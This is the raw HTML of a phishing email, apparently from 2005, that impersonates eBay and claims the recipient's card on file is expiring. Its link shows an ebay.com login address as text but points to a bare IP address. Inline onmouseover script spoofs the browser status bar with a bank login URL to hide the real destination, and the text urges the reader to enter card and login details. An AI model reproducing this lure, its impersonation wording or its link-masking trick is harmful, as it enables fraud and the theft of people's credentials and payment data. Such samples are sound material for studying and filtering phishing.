
<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft DHTML Editing Control">
<TITLE></TITLE>
</HEAD>
<BODY>
<P>Hello eBay user,<BR><BR>This is a courtesy reminder that the following
credit/debit card on <BR>file for your eBay account will soon
expire:<BR><BR>EBay Account ID:  E000125151608-702<BR>Card:  MSC
XXXX-XXXX-XXXX-XXXX<BR>Expiration Date:  05/2005<BR>Date Reminder
Issued:  19-05-2005<BR><BR>In order to receive uninterrupted service, please
update this <BR>information by follow the link below:</P><BR><BR>


<A
onmouseover="window.status='https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info';return
true;"
onmouseout="window.status=' ';return
true;"
href="http://203.160.175.93/eBay/">https://login.personal.ebay.com/logon/logon.asp?dd=1&Update&Your&Info</A>
<BR><BR>
<P>




<BR>To update your credit/debit card information:<BR>
-   Go to the eBay Home page<BR>   -   Select My
eBay and logon with your eBay User ID and Password<BR>   -
Select the Accounts Tab<BR>   -   Select Use a credit card
for automatic payments (you will need <BR>to logon again)<BR>
-   Update your credit card information following instructions on
<BR>the next page<BR><BR>Thank you for using eBay.<BR><BR>Regards,<BR>eBay
International AG<BR></P>
<P> </P>
<P> </P>
<P> </P>
<P> </P>
<P> </P>
</BODY>
</HTML>



